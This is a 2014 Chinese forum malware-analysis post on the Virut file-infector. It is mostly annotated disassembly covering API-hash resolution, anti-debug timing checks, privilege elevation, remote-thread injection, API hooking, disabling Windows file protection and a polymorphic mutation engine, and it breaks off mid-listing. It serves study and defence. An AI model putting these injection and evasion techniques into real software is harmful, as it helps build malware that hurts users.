吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 24036|回复: 54
收起左侧

[PC样本分析] 小探virut

  [复制链接]
L4Nce 发表于 2014-2-26 11:23
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 L4Nce 于 2014-3-2 16:43 编辑

样本MD5:F2C103B48634E56ACCFDEB140F33E991
这是一次对virut病毒的简单分析。
并没有走全部的处理流程,只是走了一遍在我虚拟机中运行的流程。可能有部分过程并没有分析到。
对virut的反汇编长度引擎做了简要分析,看起来还是比较小巧的。
其中对于virut的变异引擎只是大致做了分析,还有很多不明白之处。水平有限。
这次分析是个学习的过程,所以报告中应该会有各种错误和不足。
还请各位前辈赐教。
感谢ximo师傅给我的样本。

[C++] 纯文本查看 复制代码
004010D2    56              push esi
004010D3  - E9 82FD0000     jmp 1(no_jun.00410E5A 
004010D8    008B F08A003C   add byte ptr ds:[ebx+0x3C008AF0],cl

在样本上发现,该病毒替换了原来的代码,进入自己病毒的代码段,获得控制权限

[C++] 纯文本查看 复制代码
00410DE7    8B1D E0634000   mov ebx,dword ptr ds:[<&KERNEL32.Get>; 获取了kernel的一个函数
00410DED    8B6C24 20       mov ebp,dword ptr ss:[esp+0x20]
00410DF1    814424 20 7402F>add dword ptr ss:[esp+0x20],0xFFFF02>
00410DF9    81E3 00F0FFFF   and ebx,-0x1000                      ; 根据内存对齐取整
00410DFF    803B 4D         cmp byte ptr ds:[ebx],0x4D           ; 寻找dos头标志

在shellcode或病毒中获得kernel32的基址是很关键的。
[C++] 纯文本查看 复制代码
00410F03   /0F85 0A000000   jnz 1(no_jun.00410F13
00410F09   |807B 01 5A      cmp byte ptr ds:[ebx+0x1],0x5A       ; 确认标志
00410F0D   |0F84 72000000   je 1(no_jun.00410F85
00410F13   \81C3 00FFFFFF   add ebx,-0x100                       ; 减去0x100后继续搜寻
00410F19  ^ E9 E1FEFFFF     jmp 1(no_jun.00410DFF

在获取了kernel32的基址之后,压入了两个立即数进入了一个call
开始解析PE结构获取导出函数。
[C++] 纯文本查看 复制代码
00410F25    8B43 3C         mov eax,dword ptr ds:[ebx+0x3C]      ; 找到pe头偏移
00410F28    8B5418 78       mov edx,dword ptr ds:[eax+ebx+0x78]  ; 定位到数据目录表
00410F2C    8D141A          lea edx,dword ptr ds:[edx+ebx]       ; 数据目录第一项是导出表
00410F2F    EB 32           jmp short 1(no_jun.00410F63

[C++] 纯文本查看 复制代码
0040D04E    41              inc ecx
0040D04F    3B4A 18         cmp ecx,dword ptr ds:[edx+0x18]      ; 判断是否为空
0040D052    8D3C18          lea edi,dword ptr ds:[eax+ebx]       ; 获取导出函数名指针

[C++] 纯文本查看 复制代码
00410EDF    33C0            xor eax,eax
00410EE1    50              push eax
00410EE2    C1E0 04         shl eax,0x4                          ; 这三句是主要的hash算法
00410EE5    870424          xchg dword ptr ss:[esp],eax
00410EE8    290424          sub dword ptr ss:[esp],eax
00410EEB  ^ EB 84           jmp short 1(no_jun.00410E71

[C++] 纯文本查看 复制代码
00410E71    0FB607          movzx eax,byte ptr ds:[edi]          ; 开始获取字符串每一位
00410E74    290424          sub dword ptr ss:[esp],eax           ; 进行运算处理
00410E77    47              inc edi                              ; 下一位字符
00410E78    803F 00         cmp byte ptr ds:[edi],0x0            ; 结束标志
00410E7B  ^ EB 8A           jmp short 1(no_jun.00410E07

[C++] 纯文本查看 复制代码
00410E0E    35 650B5414     xor eax,0x14540B65                   ; xor 解密
00410E13    3B4424 04       cmp eax,dword ptr ss:[esp+0x4]       ; 和传入的参数比较
00410E17    0F85 4E010000   jnz 1(no_jun.00410F6B                ; 不等再次循环寻找

[C++] 纯文本查看 复制代码
00410F71    25 FFFF0000     and eax,0xFFFF
00410F76    8B3487          mov esi,dword ptr ds:[edi+eax*4]
00410F79    03F3            add esi,ebx                          ; 最后根据导出表结构算出函数真实地址
00410F7B    C2 0400         retn 0x4

刚才push进来的两个立即数分别代表了两个函数,病毒使用变形引擎干扰了函数的参数,这个变异再之后的代码中依旧有体现。
至于病毒为何使用hash来寻找函数的原因应该是节省空间吧,这个手法被广泛用于shellcode中,一个函数名几乎都是大于4个字节的。而hash用4个字节就能很好的区别各种函数。
[C++] 纯文本查看 复制代码
0040D091    52              push edx
0040D092    FF95 61020000   call dword ptr ss:[ebp+0x261]        ; kernel32.CreateEventA
0040D098    83C4 20         add esp,0x20
0040D09B    C3              retn

建立了事件对象
[C++] 纯文本查看 复制代码
00410E22    6A 02           push 0x2
00410E24    6A FE           push -0x2
00410E26    FFD6            call esi                             ; SetThreadAffinityMask

之后调用了这个函数,这个函数没怎么接触过,查了资料说是就能为各个线程设置亲缘性屏蔽,使得某个线程只能在某个cpu上运行。这是对多核的兼容吧。
[C++] 纯文本查看 复制代码
0040D00E    68 C10F60D1     push 0xD1600FC1
0040D013    E8 0D3F0000     call 1(no_jun.00410F25
0040D018    E8 613F0000     call 1(no_jun.00410F7E               ; 获取滴答函数

然后继续获取函数。获取了滴答函数。这个函数一般两个用途,反调试和获取随机数。
[C++] 纯文本查看 复制代码
00410F7E    FFD6            call esi                             ; GetTickCount
00410ECF    FFD6            call esi                             ; GetTickCount
00410ED1    3B0424          cmp eax,dword ptr ss:[esp]           ; 比较两个时间差
00410ED4  ^ 0F84 F5FFFFFF   je 1(no_jun.00410ECF                 ; 若相等死循环

此处对比了两个滴答的值,要是滴答函数被人动了手脚,比如会返回一个固定的值的话就会陷入死循环中。
[C++] 纯文本查看 复制代码
00410EA4    56              push esi
00410EA5    59              pop ecx
00410EA6    91              xchg eax,ecx
00410EA7    0F31            rdtsc

            rdtsc再次调用了            rdtsc,这个指令和滴答函数的作用差不多。
[AppleScript] 纯文本查看 复制代码
00410E4D    52              push edx
00410E4E    50              push eax
00410E4F    51              push ecx
00410E50    E8 29010000     call 1(no_jun.00410F7E

保存这些数据之后再来一套刚才的过程。
[C++] 纯文本查看 复制代码
00410E80    2B0C24          sub ecx,dword ptr ss:[esp]
00410E83    2B4424 04       sub eax,dword ptr ss:[esp+0x4]
00410E87    1B5424 08       sbb edx,dword ptr ss:[esp+0x8]
00410E8B    83C4 0C         add esp,0xC
00410E8E  ^ E9 ECC1FFFF     jmp 1(no_jun.0040D07F

算出时间差,唔,调试和正常执行时间总是会差很多的。
[C++] 纯文本查看 复制代码
0040D000    3010            xor byte ptr ds:[eax],dl
0040D002    6BD2 0D         imul edx,edx,0xD
0040D005    40              inc eax
0040D006    49              dec ecx
0040D007    86F2            xchg dl,dh
0040D009    E9 103F0000     jmp 1(no_jun.00410F1E

开始解码数据
[C++] 纯文本查看 复制代码
0040D0B3    C70424 AD50D0EE mov dword ptr ss:[esp],0xEED050AD
0040D0BA    E8 663E0000     call 1(no_jun.00410F25
0040D0BF    56              push esi

这里是一个push 的变形,也是为了获取导出函数。获得了GetProcAddress.

[C++] 纯文本查看 复制代码
0040DBF3    AD               lods dword ptr ds:[esi]
0040DBF4    51               push ecx
0040DBF5    56               push esi
0040DBF6    57               push edi
0040DBF7    83BD DA541B00 00 cmp dword ptr ss:[ebp+0x1B54DA],0x0
0040DBFE    74 08            je short 1(no_jun.0040DC08
0040DC00    3385 D6541B00    xor eax,dword ptr ss:[ebp+0x1B54D6]
0040DC06    EB 06            jmp short 1(no_jun.0040DC0E
0040DC08    3385 9F101B00    xor eax,dword ptr ss:[ebp+0x1B109F]
0040DC0E    50               push eax
0040DC0F    89A5 DE541B00    mov dword ptr ss:[ebp+0x1B54DE],esp
0040DC15    83BD DA541B00 00 cmp dword ptr ss:[ebp+0x1B54DA],0x0
0040DC1C    74 08            je short 1(no_jun.0040DC26
0040DC1E    FF95 DA541B00    call dword ptr ss:[ebp+0x1B54DA]
0040DC24    EB 05            jmp short 1(no_jun.0040DC2B
0040DC26    E8 01F3FFFF      call 1(no_jun.0040CF2C
0040DC2B    3BA5 DE541B00    cmp esp,dword ptr ss:[ebp+0x1B54DE]
0040DC31    75 05            jnz short 1(no_jun.0040DC38
0040DC33    59               pop ecx
0040DC34    33C0             xor eax,eax
0040DC36    EB 3E            jmp short 1(no_jun.0040DC76
0040DC38    8BC6             mov eax,esi
0040DC3A    8B53 3C          mov edx,dword ptr ds:[ebx+0x3C]
0040DC3D    2BC3             sub eax,ebx
0040DC3F    2B441A 78        sub eax,dword ptr ds:[edx+ebx+0x78]
0040DC43    72 30            jb short 1(no_jun.0040DC75
0040DC45    2B441A 7C        sub eax,dword ptr ds:[edx+ebx+0x7C]
0040DC49    73 2A            jnb short 1(no_jun.0040DC75
0040DC4B    83EC 40          sub esp,0x40
0040DC4E    8BFC             mov edi,esp
0040DC50    AC               lods byte ptr ds:[esi]
0040DC51    3C 2E            cmp al,0x2E
0040DC53    74 03            je short 1(no_jun.0040DC58
0040DC55    AA               stos byte ptr es:[edi]
0040DC56  ^ EB F8            jmp short 1(no_jun.0040DC50
0040DC58    B8 2E444C4C      mov eax,0x4C4C442E
0040DC5D    AB               stos dword ptr es:[edi]
0040DC5E    B0 00            mov al,0x0
0040DC60    AA               stos byte ptr es:[edi]
0040DC61    54               push esp
0040DC62    FF95 24501B00    call dword ptr ss:[ebp+0x1B5024]
0040DC68    83C4 40          add esp,0x40
0040DC6B    56               push esi
0040DC6C    50               push eax
0040DC6D    FF95 0C501B00    call dword ptr ss:[ebp+0x1B500C]
0040DC73    EB 01            jmp short 1(no_jun.0040DC76
0040DC75    96               xchg eax,esi
0040DC76    5F               pop edi
0040DC77    5E               pop esi
0040DC78    59               pop ecx
0040DC79    AB               stos dword ptr es:[edi]
0040DC7A    49               dec ecx

这段代码开始连续的获得函数再填充到某个地方,应该是为自己调用做准备。
上一张填充完的图
func.jpg
具体的函数是(kernerl32)部分。我们可以根据这些函数一窥病毒的功能。这样动态的填充对一些敏感函数有很好的保护作用吧。比如CreateRemoteThread
004110DC  7C80B731  kernel32.GetModuleHandleA
004110E0  7C834D59  kernel32.lstrcatA
004110E4  7C810FC2  kernel32.lstrcatW
004110E8  7C80BB31  kernel32.lstrcmpiA
004110EC  7C80BAF4  kernel32.lstrcpyW
004110F0  7C80BE46  kernel32.lstrlenA
004110F4  7C809A99  kernel32.lstrlenW
004110F8  7C801A28  kernel32.CreateFileA
004110FC  7C8094EE  kernel32.CreateFileMappingA
00411100  7C80236B  kernel32.CreateProcessA
00411104  7C8104BC  kernel32.CreateRemoteThread
00411108  7C8106C7  kernel32.CreateThread
0041110C  7C865B1F  kernel32.CreateToolhelp32Snapshot
00411110  7C80C0E8  kernel32.ExitThread
00411114  7C80AC6E  kernel32.FreeLibrary
00411118  7C8115CC  kernel32.GetFileAttributesA
0041111C  7C810B07  kernel32.GetFileSize
00411120  7C831C35  kernel32.GetFileTime
00411124  7C80B55F  kernel32.GetModuleFileNameA
00411128  7C814F7A  kernel32.GetSystemDirectoryA
0041112C  7C861807  kernel32.GetTempFileNameA
00411130  7C835DE2  kernel32.GetTempPathA
00411134  7C80932E  kernel32.GetTickCount
00411138  7C81126A  kernel32.GetVersion
0041113C  7C812B6E  kernel32.GetVersionExA
00411140  7C821B8D  kernel32.GetVolumeInformationA
00411144  7C82134B  kernel32.GetWindowsDirectoryA
00411148  7C80FDBD  kernel32.GlobalAlloc
0041114C  7C801D7B  kernel32.LoadLibraryA
00411150  7C80B995  kernel32.MapViewOfFile
00411154  7C8309D1  kernel32.OpenProcess
00411158  7C864DF5  kernel32.Process32First
0041115C  7C864F68  kernel32.Process32Next
00411160  7C801812  kernel32.ReadFile
00411164  7C83205E  kernel32.SetEndOfFile
00411168  7C812812  kernel32.SetFileAttributesA
0041116C  7C810C1E  kernel32.SetFilePointer
00411170  7C831CA8  kernel32.SetFileTime
00411174  7C82FA6A  kernel32.SetThreadAffinityMask
00411178  7C802446  kernel32.Sleep
0041117C  7C80BA04  kernel32.UnmapViewOfFile
00411180  7C809AE1  kernel32.VirtualAlloc
00411184  7C810E17  kernel32.WriteFile
[C++] 纯文本查看 复制代码
0040DED0    6A 00            push 0x0
0040DED2    6A 18            push 0x18
0040DED4    8BD4             mov edx,esp
0040DED6    6A 00            push 0x0
0040DED8    68 00860000      push 0x8600
0040DEDD    8BCC             mov ecx,esp
0040DEDF    6A 00            push 0x0
0040DEE1    8BC4             mov eax,esp
0040DEE3    6A 00            push 0x0
0040DEE5    68 00000008      push 0x8000000
0040DEEA    6A 40            push 0x40
0040DEEC    51               push ecx
0040DEED    52               push edx
0040DEEE    6A 0E            push 0xE
0040DEF0    50               push eax
0040DEF1    FF95 E0501B00    call dword ptr ss:[ebp+0x1B50E0]     ; ZwCreateSection

建立名为\BaseNamedObjects\cmvtVt的Section貌似名字是随机的。。
[C++] 纯文本查看 复制代码
0040D3BB    68 00460000      push 0x4600
0040D3C0    8BD4             mov edx,esp
0040D3C2    6A 00            push 0x0
0040D3C4    8BCC             mov ecx,esp
0040D3C6    6A 04            push 0x4
0040D3C8    6A 00            push 0x0
0040D3CA    6A 02            push 0x2
0040D3CC    52               push edx
0040D3CD    6A 00            push 0x0
0040D3CF    68 00460000      push 0x4600
0040D3D4    6A 00            push 0x0
0040D3D6    51               push ecx
0040D3D7    6A FF            push -0x1
0040D3D9    50               push eax
0040D3DA    FF95 E8501B00    call dword ptr ss:[ebp+0x1B50E8]     ; ntdll.ZwMapViewOfSection

用ZwMapViewOfSection函数映射内存。
[C++] 纯文本查看 复制代码
0040D519    B9 4D0F0000      mov ecx,0xF4D
0040D51E    F3:A5            rep movs dword ptr es:[edi],dword pt>
0040D520    8DB5 1C4F1B00    lea esi,dword ptr ss:[ebp+0x1B4F1C]
0040D526    B9 B9010000      mov ecx,0x1B9
0040D52B    F3:A5            rep movs dword ptr es:[edi],dword pt>
0040D52D    FFE0             jmp eax

开始传输代码,并跳到这些代码中。
[C++] 纯文本查看 复制代码
009106BD   /74 1A            je short 009106D9
009106BF   |8BC3             mov eax,ebx
009106C1   |2B85 241B1B00    sub eax,dword ptr ss:[ebp+0x1B1B24]
009106C7   |72 10            jb short 009106D9
009106C9   |83F8 04          cmp eax,0x4
009106CC   |73 0B            jnb short 009106D9
009106CE   |8A8428 281B1B00  mov al,byte ptr ds:[eax+ebp+0x1B1B28>
009106D5   |46               inc esi
009106D6   |AA               stos byte ptr es:[edi]
009106D7   |EB 01            jmp short 009106DA
009106D9   \A4               movs byte ptr es:[edi],byte ptr ds:[>
009106DA    43               inc ebx
009106DB  ^ E2 CD            loopd short 009106AA
009106DD    FEC2             inc dl
009106DF    5E               pop esi
009106E0    3A95 23171B00    cmp dl,byte ptr ss:[ebp+0x1B1723]
009106E6  ^ 72 9B            jb short 00910683


有是代码转移,注意这些代码是刚才分析的注意cc断点。不然注定悲剧。
[C#] 纯文本查看 复制代码
0091051F    E8 14010000      call 00910638
00910524    50               push eax
00910525    54               push esp
00910526    6A 20            push 0x20
00910528    6A FF            push -0x1
0091052A    FF95 F0501B00    call dword ptr ss:[ebp+0x1B50F0]     ; ZwOpenProcessToken


设置访问令牌提升权限。

[C++] 纯文本查看 复制代码
00910DC9    FF95 94501B00    call dword ptr ss:[ebp+0x1B5094]     ; LoadLibraryA
00910DCF    8985 10501B00    mov dword ptr ss:[ebp+0x1B5010],eax
00910DD5    E8 16000000      call 00910DF0

之后获取函数LookupPrivilegeValueA
[C++] 纯文本查看 复制代码
00910F5C    56               push esi
00910F5D    33F6             xor esi,esi
00910F5F    6A 02            push 0x2
00910F61    56               push esi
00910F62    56               push esi
00910F63    8BD4             mov edx,esp
00910F65    6A 01            push 0x1
00910F67    52               push edx
00910F68    FF72 18          push dword ptr ds:[edx+0x18]
00910F6B    56               push esi
00910F6C    FF95 14501B00    call dword ptr ss:[ebp+0x1B5014]     ; advapi32.LookupPrivilegeValueA
00910F72    8BC4             mov eax,esp

查询权限。
[C++] 纯文本查看 复制代码
00910F6C    FF95 14501B00    call dword ptr ss:[ebp+0x1B5014]
00910F72    8BC4             mov eax,esp
00910F74    56               push esi
00910F75    56               push esi
00910F76    56               push esi
00910F77    50               push eax
00910F78    56               push esi
00910F79    FF70 18          push dword ptr ds:[eax+0x18]
00910F7C    FF95 D0501B00    call dword ptr ss:[ebp+0x1B50D0]     ; ntdll.ZwAdjustPrivilegesToken


[C++] 纯文本查看 复制代码
00910556    FFB5 10501B00    push dword ptr ss:[ebp+0x1B5010]
0091055C    FF95 5C501B00    call dword ptr ss:[ebp+0x1B505C]
00910562    57               push edi
00910563    FF95 04501B00    call dword ptr ss:[ebp+0x1B5004]     ; kernel32.CloseHandle

目测收尾了,告一段落
[C++] 纯文本查看 复制代码
00910563    FF95 04501B00    call dword ptr ss:[ebp+0x1B5004]
00910569    6A 00            push 0x0
0091056B    6A 02            push 0x2
0091056D    FF95 54501B00    call dword ptr ss:[ebp+0x1B5054]     ; kernel32.CreateToolhelp32Snapshot

建立快照
[C++] 纯文本查看 复制代码
00910578     97               xchg eax,edi
00910579     2BE1             sub esp,ecx
0091057B     890C24           mov dword ptr ss:[esp],ecx
0091057E     54               push esp
0091057F     57               push edi
00910580     FF95 A0501B00    call dword ptr ss:[ebp+0x1B50A0]     ; kernel32.Process32First


获取第一个进程句柄。
[C++] 纯文本查看 复制代码
00910586     33F6             xor esi,esi
00910588     83A5 50511B00 00 and dword ptr ss:[ebp+0x1B5150],0x0
0091058F     54               push esp
00910590     57               push edi
00910591     FF95 A4501B00    call dword ptr ss:[ebp+0x1B50A4]     ; kernel32.Process32Next
00910597     85C0             test eax,eax
00910599     74 6E            je short 00910609
0091059B     46               inc esi
0091059C     83FE 04          cmp esi,0x4
0091059F   ^ 72 EE            jb short 0091058F

去掉前面4个。
[C] 纯文本查看 复制代码
009105A5     6A 00            push 0x0
009105A7     6A 2A            push 0x2A
009105A9     FF95 9C501B00    call dword ptr ss:[ebp+0x1B509C]     ; kernel32.OpenProcess
009105AF     85C0             test eax,eax
00911050     51               push ecx
00911051     66:8B85 00501B00 mov ax,word ptr ss:[ebp+0x1B5000]
00911058     52               push edx
00911059     50               push eax
0091105A     8BC4             mov eax,esp
0091105C     51               push ecx
0091105D     51               push ecx
0091105E     6A 40            push 0x40
00911060     50               push eax
00911061     51               push ecx
00911062     6A 18            push 0x18
00911064     83C0 08          add eax,0x8
00911067     54               push esp
00911068     6A 0E            push 0xE
0091106A     50               push eax
0091106B     FF95 F4501B00    call dword ptr ss:[ebp+0x1B50F4]     ; ntdll.ZwOpenSection
00911097     6A 00            push 0x0
00911099     8BCC             mov ecx,esp
0091109B     6A 40            push 0x40
0091109D     68 00001000      push 0x100000
009110A2     6A 02            push 0x2
009110A4     52               push edx
009110A5     6A 00            push 0x0
009110A7     68 00860000      push 0x8600
009110AC     6A 00            push 0x0
009110AE     51               push ecx
009110AF     53               push ebx
009110B0     50               push eax
009110B1     FF95 E8501B00    call dword ptr ss:[ebp+0x1B50E8]     ; ntdll.ZwMapViewOfSection




打开进程和section建立好映射
[C++] 纯文本查看 复制代码
00910F9C     51               push ecx
00910F9D     50               push eax
00910F9E     53               push ebx
00910F9F     6A 05            push 0x5
00910FA1     8BCC             mov ecx,esp
00910FA3     50               push eax
00910FA4     8BD4             mov edx,esp
00910FA6     50               push eax
00910FA7     54               push esp
00910FA8     6A 40            push 0x40
00910FAA     51               push ecx
00910FAB     52               push edx
00910FAC     53               push ebx
00910FAD     FF95 F8501B00    call dword ptr ss:[ebp+0x1B50F8]     ; ZwProtectVirtualMemory
00910FB3     83C4 0C          add esp,0xC
00910FB6     FF95 08511B00    call dword ptr ss:[ebp+0x1B5108]     ; ntdll.ZwWriteVirtualMemory


这里用了参数的变异

[AppleScript] 纯文本查看 复制代码
009110DB     8B85 D4501B00    mov eax,dword ptr ss:[ebp+0x1B50D4]  ; ZwCreateFile
009110E1     8D8F 053E0000    lea ecx,dword ptr ds:[edi+0x3E05]
009110E7     E8 9DFEFFFF      call 00910F89
009110EC     8B85 EC501B00    mov eax,dword ptr ss:[ebp+0x1B50EC]  ; ZwOpenFile
009110F2     8D8F 8A3E0000    lea ecx,dword ptr ds:[edi+0x3E8A]
009110F8     E8 8CFEFFFF      call 00910F89
009110FD     8B85 D8501B00    mov eax,dword ptr ss:[ebp+0x1B50D8]  ; ZwCreateProcess
00911103     8D8F 943E0000    lea ecx,dword ptr ds:[edi+0x3E94]
00911109     E8 7BFEFFFF      call 00910F89
0091110E     8B85 DC501B00    mov eax,dword ptr ss:[ebp+0x1B50DC]  ; ZwCreateProcessEx
00911114     85C0             test eax,eax
00911116     74 0B            je short 00911123
00911118     8D8F A13E0000    lea ecx,dword ptr ds:[edi+0x3EA1]
0091111E     E8 66FEFFFF      call 00910F89
00911123     8B85 E4501B00    mov eax,dword ptr ss:[ebp+0x1B50E4]
00911129     85C0             test eax,eax
0091112B     74 0B            je short 00911138
0091112D     8D8F AE3E0000    lea ecx,dword ptr ds:[edi+0x3EAE]
00911133     E8 51FEFFFF      call 00910F89
00911138     8B85 FC501B00    mov eax,dword ptr ss:[ebp+0x1B50FC]  ; ZwQueryInformationProcess
0091113E     85C0             test eax,eax
00911140     74 0B            je short 0091114D

做好这些函数的hook
[C++] 纯文本查看 复制代码
009105DE     50               push eax
009105DF     54               push esp
009105E0     50               push eax
009105E1     56               push esi
009105E2     51               push ecx
009105E3     50               push eax
009105E4     50               push eax
009105E5     53               push ebx
009105E6     FF95 4C501B00    call dword ptr ss:[ebp+0x1B504C]     ; kernel32.CreateRemoteThread
009105EC     85C0             test eax,eax

开启远程线程
--------------------------------------------------------------------------------叫我分割线-------------------------------------------------------------------------------------------------------------------
进入到远程线程部分。先用od附加起目标进程。
根据远程线程的参数设置好断点

[C++] 纯文本查看 复制代码
7FF5191F    55              push ebp
7FF51920    E8 00000000     call 7FF51925
7FF51925    5D              pop ebp
7FF51926    81ED 25291B00   sub ebp,0x1B2925
7FF5192C    C685 23161B00 0>mov byte ptr ss:[ebp+0x1B1623],0x0
7FF51933    83BD 1C501B00 0>cmp dword ptr ss:[ebp+0x1B501C],0x0
7FF5193A    74 4E           je short 7FF5198A
7FF5193C    6A 1E           push 0x1E
7FF5193E    8BB5 1C501B00   mov esi,dword ptr ss:[ebp+0x1B501C]
7FF51944    59              pop ecx
7FF51945    AC              lods byte ptr ds:[esi]
7FF51946    3C 2E           cmp al,0x2E


进入其中

[C++] 纯文本查看 复制代码
7FF519B5    FF95 0C501B00   call dword ptr ss:[ebp+0x1B500C]         ; GetProcAddress
7FF519BB    85C0            test eax,eax                             ; sfc.#2
7FF519BB    85C0            test eax,eax
7FF519BD    74 02           je short 7FF519C1
7FF519BF    FFD0            call eax                                 ; sfc.#2
7FF519C1    E8 0B000000     call 7FF519D1

获取这个函数sfc.#2调用之
[C++] 纯文本查看 复制代码
7FF711F2    83C7 0F         add edi,0xF
7FF711F5    57              push edi
7FF711F6    8BD4            mov edx,esp
7FF711F8    53              push ebx
7FF711F9    8BCC            mov ecx,esp
7FF711FB    50              push eax
7FF711FC    54              push esp
7FF711FD    6A 40           push 0x40
7FF711FF    51              push ecx
7FF71200    52              push edx
7FF71201    6A FF           push -0x1
7FF71203    FF95 F8501B00   call dword ptr ss:[ebp+0x1B50F8]         ; ntdll.ZwProtectVirtualMemory


修改访问属性
[C++] 纯文本查看 复制代码
7FF71203    FF95 F8501B00   call dword ptr ss:[ebp+0x1B50F8]
7FF71209    83C4 0C         add esp,0xC
7FF7120C    8B95 58501B00   mov edx,dword ptr ss:[ebp+0x1B5058]
7FF71212    2BD7            sub edx,edi
7FF71214    83EA 07         sub edx,0x7
7FF71217    C707 6A00E800   mov dword ptr ds:[edi],0xE8006A
7FF7121D    8957 03         mov dword ptr ds:[edi+0x3],edx
7FF71220    C3              retn


修改掉,应该是干掉了win的某种保护机制
原始:
1.jpg
修改之后
2.jpg
[C++] 纯文本查看 复制代码
7FF719DC    8DB5 62511B00   lea esi,dword ptr ss:[ebp+0x1B5162]
7FF719E2    68 04010000     push 0x104
7FF719E7    56              push esi
7FF719E8    FF95 70501B00   call dword ptr ss:[ebp+0x1B5070]         ; kernel32.GetSystemDirectoryA


获取系统目录
[C++] 纯文本查看 复制代码
7FF71A40    FF95 94501B00   call dword ptr ss:[ebp+0x1B5094]
7FF71A46    93              xchg eax,ebx
7FF71A47    68 04000000     push 0x4
7FF71A4C    8DB5 4C1F1B00   lea esi,dword ptr ss:[ebp+0x1B1F4C]
7FF71A52    59              pop ecx
7FF71A53    8DBD 40511B00   lea edi,dword ptr ss:[ebp+0x1B5140]
7FF71A59    E8 CAF2FFFF     call 7FF70D28                                ; 填充函数地址 advapi32系列注册表操作函数
7FF71A5E    55              push ebp
7FF71A5F    81C5 05101B00   add ebp,0x1B1005
7FF71A65    E8 A5E5FFFF     call 7FF7000F                                ; 建立事件对象
7FF71A6A    5D              pop ebp
7FF71A6B    FF95 7C501B00   call dword ptr ss:[ebp+0x1B507C]             ; 运行滴答函数
7FF71A71    8985 B6541B00   mov dword ptr ss:[ebp+0x1B54B6],eax
7FF71A77    8B85 9F101B00   mov eax,dword ptr ss:[ebp+0x1B109F]
7FF71A7D    E8 03FEFFFF     call 7FF71885                                ; xor部分代码
7FF71A82    0F31            rdtsc
7FF71A84    8985 9F101B00   mov dword ptr ss:[ebp+0x1B109F],eax
7FF71A8A    0085 C2111B00   add byte ptr ss:[ebp+0x1B11C2],al
7FF71A90    E8 F0FDFFFF     call 7FF71885                                ; xor部分代码
7FF71A95    33C9            xor ecx,ecx
7FF71A97    51              push ecx
7FF71A98    8DB5 00101B00   lea esi,dword ptr ss:[ebp+0x1B1000]
7FF71A9E    0FB7848D 101C1B>movzx eax,word ptr ss:[ebp+ecx*4+0x1B1C10]
7FF71AA6    0FB68C8D 121C1B>movzx ecx,byte ptr ss:[ebp+ecx*4+0x1B1C12]
7FF71AAE    03F0            add esi,eax
7FF71AB0    51              push ecx
7FF71AB1    E8 5E210000     call 7FF73C14                                ; 反汇编长度引擎
7FF71AB6    6A 05           push 0x5
7FF71AB8    58              pop eax


关于这个反汇编长度引擎,大致看了看,就是根据第一字节的opcode 查表,获取指令类型。之后根绝不同的类型解析指令类似,mod、sib、偏移、立即数什么。这部分知识我已经有点生疏。要完整分析这个引擎需要我大量时间,水平不够。。。。

那么接下来是个病毒的指令变异引擎。动态变化消去特征
[C++] 纯文本查看 复制代码
7FF71A97    51              push ecx                                     ; 保存
7FF71A98    8DB5 00101B00   lea esi,dword ptr ss:[ebp+0x1B1000]          ; 获取基地址
7FF71A9E    0FB7848D 101C1B>movzx eax,word ptr ss:[ebp+ecx*4+0x1B1C10]   ; 根据第几次选择偏移
7FF71AA6    0FB68C8D 121C1B>movzx ecx,byte ptr ss:[ebp+ecx*4+0x1B1C12]   ; 反汇编模式?这个参数不确定
7FF71AAE    03F0            add esi,eax
7FF71AB0    51              push ecx
7FF71AB1    E8 5E210000     call 7FF73C14                                ; 反汇编长度引擎
7FF71AB6    6A 05           push 0x5                                     ; ecx是当前esi所指指令长度
7FF71AB8    58              pop eax
7FF71AB9    E8 6AF7FFFF     call 7FF71228                                ; 随机数生成函数eax为参数
7FF71ABE    0AD2            or dl,dl                                     ; 分析随机数类型
7FF71AC0    74 04           je short 7FF71AC6
7FF71AC2    03F1            add esi,ecx                                  ; 下一条指令
7FF71AC4    EB 1D           jmp short 7FF71AE3
7FF71AC6    8DBD 62511B00   lea edi,dword ptr ss:[ebp+0x1B5162]
7FF71ACC    51              push ecx                                     ; 长度
7FF71ACD    56              push esi                                     ; 源指令
7FF71ACE    F3:A4           rep movs byte ptr es:[edi],byte ptr ds:[esi] ; 传送
7FF71AD0    E8 3F210000     call 7FF73C14                                ; 长度引擎
7FF71AD5    5F              pop edi
7FF71AD6    F3:A4           rep movs byte ptr es:[edi],byte ptr ds:[esi] ; 覆盖掉上一条指令
7FF71AD8    59              pop ecx
7FF71AD9    57              push edi
7FF71ADA    8DB5 62511B00   lea esi,dword ptr ss:[ebp+0x1B5162]
7FF71AE0    F3:A4           rep movs byte ptr es:[edi],byte ptr ds:[esi]
7FF71AE2    5E              pop esi                                      ; 这里是一个变形引擎,会根据随机数动态的交换两条指令
7FF71AE3    59              pop ecx                                      ; 能够变形的指令记录在表
7FF71AE4  ^ E2 CA           loopd short 7FF71AB0
7FF71AE6    59              pop ecx
7FF71AE7    FEC1            inc cl                                       ; 记数
7FF71AE9    80F9 10         cmp cl,0x10                                  ; 处理16条指令
7FF71AEC  ^ 72 A9           jb short 7FF71A97


这个手法可以学习
[C++] 纯文本查看 复制代码
7FF71AF1    E8 32F7FFFF     call 7FF71228                                ; 随机数生成
7FF71AF6    85D2            test edx,edx
7FF71AF8    75 0D           jnz short 7FF71B07
7FF71AFA    8DBD 0A101B00   lea edi,dword ptr ss:[ebp+0x1B100A]
7FF71B00    B1 04           mov cl,0x4
7FF71B02    E8 35F7FFFF     call 7FF7123C
7FF71B07    FF8D 88131B00   dec dword ptr ss:[ebp+0x1B1388]
7FF71B0D    6A 20           push 0x20
7FF71B0F    58              pop eax
7FF71B10    E8 13F7FFFF     call 7FF71228                                ; 随机数生成
7FF71B15    33C9            xor ecx,ecx
7FF71B17    0FBB95 E2361B00 btc dword ptr ss:[ebp+0x1B36E2],edx
7FF71B1E    8D85 B2541B00   lea eax,dword ptr ss:[ebp+0x1B54B2]
7FF71B24    51              push ecx
7FF71B25    51              push ecx
7FF71B26    51              push ecx
7FF71B27    51              push ecx
7FF71B28    50              push eax
7FF71B29    51              push ecx
7FF71B2A    51              push ecx
